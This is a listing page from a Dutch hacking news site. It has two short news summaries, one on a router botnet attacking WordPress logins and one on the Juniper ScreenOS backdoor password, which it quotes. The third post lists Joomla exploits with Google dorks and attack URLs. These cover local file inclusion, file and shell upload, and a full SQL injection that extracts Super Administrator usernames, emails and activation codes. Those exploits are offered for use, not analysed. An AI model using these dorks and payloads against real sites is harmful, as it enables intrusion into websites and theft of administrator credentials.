The Dutch HackInfo The Dutch HackInfo
  • News
  • Hacking
    • Algemene hacker info
    • Kali Linux Info Portal
    • Black Hat conference
    • Blackhat SEO technieken
    • Hacking magazines
    • iPhone Hacking
    • Test your hack skills
    • Virus creation kit
    • Webcam Hacking
    • WiFi Hacking
  • Security
    • Anoniem surfen
    • Encryptie
    • Firewall software
    • Security Tools General
    • Virusscanner software
    • Web App Security tools
  • Tweaking
    • PlayStation tweaks
    • Wii tweaks
    • Xbox tweaks
    • Kinect tweaks
    • iPhone tweaks
    • Apple TV
    • RaspBerry Pi
    • DIY
  • Tooling
    • Wifi Pentesting
    • Implants & Remote Access
    • Hotplug Attacks
    • All other tools
  • Good Stuff
    • Peter draait door
    • Background
    • NSA Dossier
    • Live cyberaanvallen
    • The HackInfo Weekly
    • Archive
  • Zoeken
  • Sign in

Web hacking

WordPress-sites aangevallen door botnet van gehackte routers

Details
Security.nl
24 December 2015
Hits: 3284

botnetEen Italiaanse onderzoeker waarschuwt voor een botnet dat uit duizenden gehackte routers bestaat en WordPress-sites aanvalt. Het botnet voert bruteforce-aanvallen op het inloggedeelte van de websites uit. Er wordt geprobeerd om met de gebruikersnaam admin en verschillende wachtwoorden in te loggen.

Nu zijn er meer botnets die WordPress-sites aanvallen, alleen dit botnet viel op. Alle gebruikte IP-adressen waren namelijk van dezelfde IP-reeksen afkomstig. Het bleek om voornamelijk Italiaanse internetproviders te gaan. Verder onderzoek wees uit dat de aanvallen van gehackte Aethra-routers afkomstig waren. 

Read more: WordPress-sites aangevallen door botnet van gehackte routers

Wachtwoord van Juniper ScreenOS-backdoor ontdekt

Details
Sander van Voorst
21 December 2015
Hits: 3016

jupinerOnderzoeker HD Moore van het beveiligingsbedrijf Rapid7 heeft het wachtwoord gevonden waarmee de door Juniper ontdekte backdoor in zijn ScreenOS gebruikt kan worden. Het bedrijf ontdekte onlangs 'ongeautoriseerde code' in de software die wordt gebruikt op NetScreen-netwerkapparatuur. Op internet zijn zo'n 26.000 NetScreen-apparaten van netwerkfabrikant Juniper te vinden die via SSH toegankelijk zijn en daardoor risico lopen om te worden aangevallen via de vorige week ontdekte backdoors in ScreenOS.

Zijn publicatie volgt op de berichten op dat er tijdens een interne code review 'ongeautoriseerde code' in de ScreenOS-software van Juniper is gevonden. In een blogpost legt hij uit hoe hij te werk is gegaan. Door een gepatchte versie van de ScreenOS-software met een kwetsbare versie te vergelijken kwam hij eenstring tegen met de volgende tekens: <<< %s(un='%s') = %u.

Read more: Wachtwoord van Juniper ScreenOS-backdoor ontdekt

Joomla Vulnerabilities

Details
R00T
14 January 2014
Hits: 3958

joomla-logo

Overview of Joomla Exploits



1. Joomla Component (com_wrapper) Local File Include

# Date : 13/05/2013
# Exploit : +http://[Target]/[Path]/index.php?option=com_wrapper&view=wrapper& Itemid=../../../../../[LFI%00]

2. Joomla com_aclassfb File Upload Vulnerability
#Google Dork: inurl:com_aclassfb
#Date : 10/01/2014
#Vendor : http://www.almondsoft.com
#File Upload: http://127.0.0.1/index.php?option=com_aclassfb #Exploit : http://[target]/index.php?option=com_aclasfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form

3. Joomla com_kunena SQL Injection (Automatic activation code retriever) #Google Dork: "inurl:index.php?option=com_kunena" or "inurl:?option=com_kunena"
#Date : 12/05/2013
#Vendor homepage: http://www.kunena.org/
#Vulnerable path: http://[target]/index.php?option=com_kunena&func=userlist&search=%25'+and+1=2)+union+select+1,1,concat (username,0x3a,0x3a,0x3a,0x3a,email,0x3a,0x3a,activation,0x3a,usertype) ,1,1,1,1,62,1,1,0,0,0,1,15+from+jos_users+where+usertype='Super Administrator' -- ;

4. Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability
# Google Dork: "inurl:index.php?option=com_fabrik" or "index.php?option=com_fabrik"
# Date : 14/09/2012
# Vendor Homepage : http://fabrikar.com/
# Vulnerable path:
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".

More Articles …

  1. Hoe snel is uw wachtwoord gekraakt!
  2. Hacking with new DIY Google Dorks based hacking tool
  3. Meest gebruikte wachtwoorden bij SSH-aanvallen
  4. WiFi-netwerken afluisteren met pineapple
Page 1 of 5
  • Start
  • Prev
  • 1
  • 2
  • 3
  • 4
  • 5
  • Next
  • End

We have 1111 guests and no members online

Feed Entries
  • FAQ
  • About
Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License. Font Awesome font licensed under SIL OFL 1.1.